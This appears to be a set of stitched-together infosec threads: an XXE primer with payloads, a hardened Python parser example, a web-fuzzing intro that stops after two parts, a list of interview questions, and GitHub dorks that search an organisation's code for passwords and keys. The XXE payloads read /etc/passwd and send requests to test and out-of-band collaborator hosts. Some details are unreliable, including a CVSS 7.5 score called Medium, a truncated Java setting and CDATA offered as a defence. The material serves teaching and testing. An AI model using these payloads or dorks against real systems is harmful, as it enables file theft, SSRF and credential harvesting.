What are XML, entities and DTDs?
How did OWASP Top 10 2021 merge XXE into Security Misconfiguration?
XXE exploitation types & payloads for pentesters and bug bounty hunters
↓
→ XXE stands for XML External Entity
→ XXE is possible in applications that process XML data on the client side or the server side
→ All Office documents process XML data, e.g. docx, xlsx, pptx
{2/18}
→ XXE attacks are possible when a document declares external entities and the parser processes them.
→ OWASP Top 10 2017 introduced XXE at the A4 position.
→ OWASP Top 10 2021 merged XXE into Security Misconfiguration at A5.
{3/18}
→ XML stands for eXtensible Markup Language
→ XML is like HTML, but XML has no predefined tags; we define our own tags.
→ XML requires all tags to be closed, unlike some HTML tags
{4/18}
→ XML Entities:
An entity is a named placeholder used to represent data in XML; it either stores a value directly or stores an address (a URI) from which the value is loaded.
{5/18}
→ DTD (Document Type Definition):
It contains declarations that define the structure of an XML document and the types of data values it can hold.
▶️ Internal DTD: the DTD is fully self-contained within the document itself
▶️ External DTD: the DTD is loaded from elsewhere
XXE Impact:
→ Exfiltrate data from the server, e.g. reading the content of /etc/passwd or /etc/shadow
→ Escalate to SSRF
→ OOB XXE (out-of-band / blind XXE)
→ DoS (XML entity expansion)
→ Remote Code Execution
{8/18}
The CVSS score of XXE is 7.5 and its severity is Medium, with:
→ Improper Restriction of XML External Entity
→ Local File SSRF
→ Remote File SSRF
→ Billion Laughs attack
→ XXE via File Upload
{9/18}
XXE Exploitation:
→ Reading system files (the entity is declared in the DTD and then referenced in the body):
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]><foo>&xxe;</foo>
→ XXE to SSRF (the entity URI must carry a scheme):
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://test.com/"> ]><foo>&xxe;</foo>
→ OOB XXE:
<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "http://collab.burpcollab.net/"> ]><foo>&xxe;</foo>
{10/18}
Parameter Entities:
Sometimes the application blocks the use of regular entities, so parameter entities (declared with % and referenced inside the DTD) can be used instead.
→ <!ENTITY % xxe "a beautiful entity value" >
Final payload:
→ <!DOCTYPE foo [ <!ENTITY % xxe SYSTEM "http://collab.burpcollab.net/"> %xxe; ]>
{11/18}
XInclude attacks:
Useful when you can't modify the DOCTYPE, e.g. when the server embeds user-supplied data into a SOAP request on the back end, which is XML, and the parser processes it.
→
<foo xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/></foo>
{12/18}
Classic XXE, base64 encoded:
→ Payload (the base64 string decodes to file:///etc/passwd):
<!DOCTYPE test [ <!ENTITY % init SYSTEM "data://text/plain;base64,ZmlsZTovLy9ldGMvcGFzc3dk"> %init; ]><foo/>
Mitigations for XXE:
→ Disable DTDs (external entities) completely, e.g. in Java:
factory.setFeature("apache.org/xml/features/d…", true);
→ External entities and external document type declarations must be disabled
→ Use CDATA sections so untrusted input is treated as character data and any entity references in it are not expanded
{18/18}
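As an added example (not code from this thread), here is one way to implement the "disable DTDs completely" mitigation in Python using only the standard-library expat parser: any DOCTYPE, any external entity reference and any XInclude element is refused before expansion can happen, which covers every payload shape shown above. The names UnsafeXml, parse_hardened and verdict are this example's own.

```python
import xml.parsers.expat

XINCLUDE_NS = "http://www.w3.org/2001/XInclude"

class UnsafeXml(ValueError):
    """The document uses a construct the intake policy forbids."""

def parse_hardened(xml_bytes: bytes) -> dict:
    """Parse untrusted XML with stdlib expat and return {local name: text}.

    Refusing any <!DOCTYPE> means DTDs, regular/parameter entities, data:
    URIs and billion-laughs expansion can never be declared; external entity
    references and XInclude elements are refused as well (defence in depth).
    """
    parser = xml.parsers.expat.ParserCreate(namespace_separator=" ")
    result, buf = {}, []  # buf holds [local name, text] per open element

    def start_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml(f"DOCTYPE '{name}' not allowed")

    def external_entity_ref(context, base, system_id, public_id):
        raise UnsafeXml(f"external entity {system_id!r} not allowed")

    def start_element(name, attrs):
        if name.startswith(XINCLUDE_NS + " "):  # expat reports "<ns> <local>"
            raise UnsafeXml("XInclude element not allowed")
        buf.append([name.rsplit(" ", 1)[-1], ""])

    def char_data(data):
        buf[-1][1] += data

    def end_element(name):
        local, text = buf.pop()
        if text.strip():
            result[local] = text.strip()

    parser.StartDoctypeDeclHandler = start_doctype
    parser.ExternalEntityRefHandler = external_entity_ref
    parser.StartElementHandler = start_element
    parser.CharacterDataHandler = char_data
    parser.EndElementHandler = end_element
    parser.Parse(xml_bytes, True)
    return result

def verdict(xml_bytes: bytes):
    """None if the document is accepted, otherwise the rejection reason."""
    try:
        parse_hardened(xml_bytes)
    except (UnsafeXml, xml.parsers.expat.ExpatError) as exc:
        return f"{type(exc).__name__}: {exc}"
    return None
```

Feeding the thread's file-read, parameter-entity, XInclude and data:// payloads to verdict() returns a rejection reason for each, while plain XML without a DOCTYPE is parsed normally.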
Comprehensive Thread on Web App Fuzzing!
What is web fuzzing?
How can web fuzzing be super useful in Bug Bounties or Pentest?
FFUF for Web Fuzzing?
↓
{1/16}
Fuzzing is, broadly, finding bugs by supplying unexpected data to an application through automated scanning and then monitoring it for exceptions, errors and stack traces.
The aim is to feed in unexpected data to trigger exceptions and see whether they lead to an issue.
{2/16}
Fuzzing has been around for many years and has been done in different ways.
The term "fuzz" originated from a fall 1988 class project in the graduate Advanced Operating Systems class (CS736), taught by Prof. Barton Miller at the University of Wisconsin.
PS: This is a list of questions I have come across and questions my students have faced in their interviews.
Feel free to add more below 👇
1. What is your fav OWASP Top 10 bug?
2. Explain your methodology?
3. CSRF vs SSRF
4. What can an attacker do with XSS?
5. Requirements of CSRF to happen
6. Root cause of Clickjacking
7. What is the diff between SAST & DAST?
8. Black/White/Grey Box Testing
9. What is threat, vulnerability, risk?
10. What is the CIA Triad?
11. What are cookie attributes?
12. What are the most common business logic issues?
13. Question on Burpsuite tabs
14. What are your fav open source tools?
15. How will you protect against ransomware?
16. What is an XXE attack, explain any payload?
17. SSRF and what can be achieved?
18. How can we fix SQLi?
#infosec #bugbounty
💡Manual:
GitHub Dorking is basically finding leaks in the code pushed by the target organisation or its employees.
1. org:evilcorp[.]com
2. language:"bash" org:evilcorp[.]com
3. "target[.]com" language:python "secret" "password" "key" NOT docs NOT sandbox NOT test NOT fake